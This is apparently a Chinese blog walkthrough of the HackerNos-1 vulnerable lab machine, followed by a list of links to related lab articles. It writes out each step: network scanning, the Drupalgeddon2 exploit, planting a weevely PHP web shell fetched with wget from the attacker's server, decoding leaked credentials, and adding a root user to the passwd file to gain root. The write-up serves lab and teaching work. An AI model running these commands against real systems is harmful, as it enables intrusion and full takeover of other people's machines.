HackerNos-1靶場
HackerNos-1
靶機ip:192.168.9.41
攻擊機ip(kali):192.168.9.31
1.資訊收集:
nmap -sn 192.168.9.0/24
nmap -A -v 192.168.9.41
2.掃描目錄:
dirb http://192.168.9.41/drupal
3.在github中找到關於drupal的cms漏洞溢位,
找到的連線為: https://github.com/dreadlocked/Drupalgeddon2
在kali中下載克隆這個漏洞環境:
git clone https://github.com/dreadlocked/Drupalgeddon2
然後下載一個庫:
gem install highline
4.獲取一個低許可權的shell
cd /dreadlocked
./dreadlocked2.rb http://192.168.9.41/drupa
```![在這裡插入圖片描述](https://img-blog.csdnimg.cn/20201109230535565.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2NTI3MDgw,size_16,color_FFFFFF,t_70#pic_center)
在低許可權的shell中返回上一級不能成功執行,證明沒得到最高許可權
**5.許可權維持**
先寫一個木馬檔案在kali裡面
```bash
weevely generate zxc ./zxc.php
然後建立一個python服務:
python2 -m SimpleHTTPServer 8080
然後在低許可權的那個shell中下載這個木馬
wget http://192.168.9.41:8080/zxc.php
在瀏覽器中測試這個木馬是否上傳成功,空白頁證明上傳成功了
再用本機終端連線測試:
weevely http://192.168.9.41/drupal/z1.php 123456
6.提權:
檢視一個檔案
cat alexander.txt
然後是base64加密,因為他有兩個等於號
解密出來是brainfuck值,然後再解密
https://www.dcode.fr/brainfuck-language //brainfuck的解碼工具
獲取使用者名稱和密碼
james :Hacker@4514
下載passwd檔案
file_download passwd /root/桌面/passwd
建立一個新的密碼檔案
openssl passwd -1 -salt salt 123456
寫入密碼和使用者名稱:
echo 'chao:$1$salt$638tR8bROOvPnPklDQ9Vf.:0:0::/root/:/bin/bash'>>passwd
如果echo不行可以直接複製
在msf5中進行
(查詢模組省略,看截圖)
所有引數配置好之後然後run 然後shell
然後python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
進入之後再shell
然後成功彈出shell
切換使用者
su chao
passwd:zxczxc
進入之後id
證明提權成功獲取最高管理員許可權
相關文章
- Hat靶場
- UploadLabs靶場
- joker靶場
- 【靶場實戰】vulntarget-b漏洞靶場實戰
- pikachu靶場搭建
- dvwa靶場搭建
- 紅日靶場01
- 紅日靶場二
- 紅日靶場1
- HTB靶場之Busqueda
- HTB靶場之-inject
- API安全靶場crAPIAPI
- vulnhub--JIS靶場
- pick靶場-sql注入SQL
- 賽寧談靶場–面向實戰的網路靶場體系
- 【HTB靶場系列】靶機Carrier的滲透測試
- Web 靶場筆記-bWAPPWeb筆記APP
- DVWA靶場通關教程
- vulnhub靶場之ADROIT: 1.0.1
- vulnhub靶場之CROSSROADS: 1ROS
- vulnhub靶場之ORASI: 1
- vulnhub靶場之DRIFTINGBLUES: 5
- vulnhub靶場之MOMENTUM: 2
- vulnhub靶場之FUNBOX: GAOKAO
- vulnhub靶場之CEREAL: 1
- vulnhub靶場之HACKSUDO: PROXIMACENTAURIMac
- vulnhub靶場之VULNCMS: 1
- vulnhub靶場之CONTAINME: 1AI
- vulnhub靶場之LOOZ: 1
- vulnhub靶場之Chronos:1
- vulnhub靶場之EVILBOX: ONE
- vulnhub靶場之HACKSUDO: THOR
- vulnhub靶場之WIRELESS: 1
- vulnhub靶場之MOMENTUM: 1
- vulnhub靶場之HACKSUDO: SEARCH
- vulnhub靶場之PYLINGTON: 1
- vulnhub靶場之BUFFEMR: 1.0.1
- vulnhub靶場之HACKABLE: III